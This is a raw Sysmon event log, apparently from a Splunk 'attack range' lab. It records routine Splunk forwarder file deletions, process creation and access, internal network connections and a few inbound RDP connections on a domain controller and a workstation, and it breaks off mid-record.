23542300x80000000000000001050565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDCCC7A226364096B5BB7A5EAC608CD6,SHA256=F0C15A25F5D5EE7FE5938F59555EC1F0C0F86E1B37326CB54D1734C8DCF108B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:43.463{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56615-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.074{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B4A-6151-427A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.072{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.072{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.071{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.071{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.071{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B4A-6151-427A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.071{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B4A-6151-427A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.055{5EBD8912-8B4A-6151-427A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:43.825{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59407-false10.0.1.12-8000- 23542300x80000000000000001050568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:47.792{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A36357A165B5F8D0BAE56F064CC8725,SHA256=CFC74555A70D14A726E83A553A8FF339826DFB66967F9CD43964AED2D27E8EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:47.746{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72878FD0665660AC806C7C9EA4258BB6,SHA256=29B7C01428DEDF2F255F657A3F50CA4044BA2D88CD6643D500B3BF860D9FC2E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.747{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53392-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:48.840{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3908A4D6B270D42A6A85FC41C374385B,SHA256=9F2FDAFA50B2EA1A96035CB76574A927C23B0421093F5E79E69BEA17E228D39C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:48.822{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F280E1240263DFC0A34B7EFBC7C2B393,SHA256=EB294C59E22FB0A3753F0D2FCBAF1C7CF6FA74C5F7C6483C5A3D9276FF5253C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:49.855{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A938D332D7035FF718DC19C1FE48DC4,SHA256=26662A929E6D647127270A43353F1D7C570987C64A36D4F0734F7C00A0E2A9AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:49.853{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A87AEA6864E06560E9FB61067763A85,SHA256=0A036AF6EFA831CEDAA562DE901C396739787041846F0780852C707D3D583037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:49.027{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=159ADEFEDC0C5AFED798C9696AFEA364,SHA256=981EC7FE78B97489206DE74ED59CCEE587E893020AA5AA236AB5EBC29E171998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:49.027{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=977B7FED83327CB3DDB6EDE083570151,SHA256=715C38F708CB43BC67E351AA7DC8DFDA217EAA556C2864E8A94D5C1A33A62290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:50.889{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247CEC3266E8130AC950A1B00DE48FE2,SHA256=B7844EA2755710AAB411AEA7D6A55A81F90E6B36ABD3C9EEEF58F633976D84C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:50.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E712479EF3A1952EBC65E74CBCB421,SHA256=731608596738FF0624F36C7D8035577C16805467541206EFB13CFFE9932C032C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:46.349{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54423-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:51.919{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE612B7DF1DE818D1D00D5432E0A8E56,SHA256=3636FC0ECDC332C6F567D5249C555A35A47BE291C8C49E107E25825F2FBB2CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:51.886{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EE69AD9E111DD0B6C5863E33B23DEC1,SHA256=E4D61BF63C5E3CF6106A02956E2A2ED1A6116A69A5E2D6CFC38580AC152F9399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:52.920{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFA6A291431768C891DC6D06AF7E8D6F,SHA256=1FA6FB80D1FBD2444A7BAB1FAD16762E1FBCC38F93E264464E9A951A0F91D217,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:52.886{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67012035E325CD86C3EBB157AB1CB7C7,SHA256=B09A851F5A8D01D2FBA2137B3C44D0CDF71B273913A2C8DF1DC98F93F2BA5CC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:52.436{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:49.863{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53393-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.988{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B51-6151-437A-00000000FC01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B51-6151-437A-00000000FC01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.972{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B51-6151-437A-00000000FC01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.967{5EBD8912-8B51-6151-437A-00000000FC01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:53.968{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA2E6A6B769312AD0B06437EAD2A314D,SHA256=B3316754DFF878112793039288AA5721A446C3E843B8FBB8DA34628523762A92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:53.855{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 